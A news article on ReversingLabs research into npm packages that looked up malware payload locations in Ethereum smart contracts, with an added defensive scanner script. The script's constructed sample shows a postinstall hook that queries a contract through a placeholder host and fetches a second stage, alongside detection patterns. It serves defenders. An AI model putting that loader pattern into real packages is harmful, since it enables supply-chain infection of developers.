Hackers Hide Malware in Ethereum Contracts to Evade Detection

12h05 ▪ 3 min read ▪ by Peter M.

Software supply-chain attacks are evolving in a disturbing way: cybercriminals are using Ethereum smart contracts to hide malicious code in open-source libraries. Research published by the security firm ReversingLabs shows that attackers now store command-and-control instructions in blockchain contracts, which makes the malware harder for defenders to detect and take down. The approach reflects the growing sophistication of malware distribution and the blockchain's emergence as a tool of cybercrime.

[Image: The bright eyes of a hooded hacker emerge from cascading code while a cracked Ethereum logo radiates an eerie light.]

In brief

  • Attackers now use Ethereum smart contracts to hide malware in open-source libraries.
  • Malicious npm packages retrieve payloads via blockchain, bypassing traditional defenses.
  • Fake GitHub repositories amplify attacks, rotating dependencies to spread infections widely.

How the Attack Worked

The campaign primarily targeted the Node Package Manager (npm) registry, which hosts millions of JavaScript packages. Two suspicious packages, “colortoolsv2” and “mimelib2,” appeared in July and served as carriers of the malicious code.

Instead of embedding download links directly in the package, the malware ran obfuscated scripts that queried Ethereum contracts to retrieve the payload location. This sidestepped traditional detection systems, which typically flag hard-coded malicious domains.

Once the script had read the smart contract, it directed the infected package to download a secondary malware component. This design gave the attackers flexibility: they could change the payload location on the blockchain without altering the npm package itself.
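One way a defender could triage packages for the pattern just described, as an added example (not the article's or ReversingLabs' code; the sample package, file names and indicator list are constructed assumptions):

```javascript
// Added example (not from the article or ReversingLabs): a heuristic scanner that
// flags an npm package when an install-time script both queries an Ethereum
// contract and fetches a second-stage file from a location it did not hard-code.
// The package and sources below are constructed for illustration.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];

// Each indicator is a cheap textual signal; none is conclusive on its own.
const INDICATORS = [
  { name: "eth-rpc-call",     re: /\beth_call\b|\bnew\s+ethers\.|\bnew\s+Web3\(/ },
  { name: "contract-address", re: /\b0x[0-9a-fA-F]{40}\b/ },
  { name: "dynamic-download", re: /\b(fetch|axios\.get|https?\.get|https?\.request)\s*\(/ },
];

// Return the names of all indicators present in one source file.
function scanSource(code) {
  return INDICATORS.filter((i) => i.re.test(code)).map((i) => i.name);
}

// Correlate indicators across the package: the chain "contract lookup -> download"
// is the pattern described above; an install hook makes it run on `npm install`.
function assessPackage(pkg, files) {
  const hooks = INSTALL_HOOKS.filter((h) => pkg.scripts && pkg.scripts[h]);
  const hits = {};
  for (const [path, code] of Object.entries(files)) {
    const found = scanSource(code);
    if (found.length > 0) hits[path] = found;
  }
  const all = new Set(Object.values(hits).flat());
  const chain = all.has("eth-rpc-call") && all.has("dynamic-download");
  let verdict = "clean";
  if (chain && hooks.length > 0) verdict = "high";
  else if (chain) verdict = "medium";
  else if (all.size > 0) verdict = "low";
  return { verdict, hooks, hits };
}

// Constructed sample: a package whose postinstall script sketches the chain.
// The RPC host is an invalid placeholder and the contract address is all zeros.
const SAMPLE_PKG = { name: "example-color-utils", version: "1.0.0",
                     scripts: { postinstall: "node setup.js" } };
const SAMPLE_FILES = {
  "setup.js": [
    'const { ethers } = require("ethers");',
    'const provider = new ethers.JsonRpcProvider("https://rpc.example.invalid");',
    'const c = new ethers.Contract("0x0000000000000000000000000000000000000000", abi, provider);',
    "c.payloadLocation().then((u) => fetch(u));",
  ].join("\n"),
  "index.js": "module.exports = { toHex: (n) => '#' + n.toString(16) };",
};

console.log(JSON.stringify(assessPackage(SAMPLE_PKG, SAMPLE_FILES), null, 2));
```

A "high" verdict is a prompt for manual review of the install script, not proof of compromise; legitimate blockchain tooling can trip the first two indicators on its own.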

In addition, the campaign used crypto-themed GitHub repositories padded with fake stars and generated commits to appear legitimate, luring unsuspecting developers into integrating the packages.

Larger Campaign Across Open-Source Platforms

ReversingLabs researchers uncovered that the malicious npm packages were part of a broader campaign extending to GitHub projects. Fake repositories such as “solana-trading-bot-v2” attempted to establish credibility through automated commits and staged community activity. Behind the façade, attackers quietly rotated malicious dependencies under different names, spreading the infection across multiple projects.

This attack followed earlier incidents, flagged by security firms, in which npm and GitHub were abused to push fraudulent trading bots and crypto utilities. The latest campaign therefore marks a concerning evolution: threat actors are not only abusing open-source trust but also integrating blockchain technology into their attack chains.

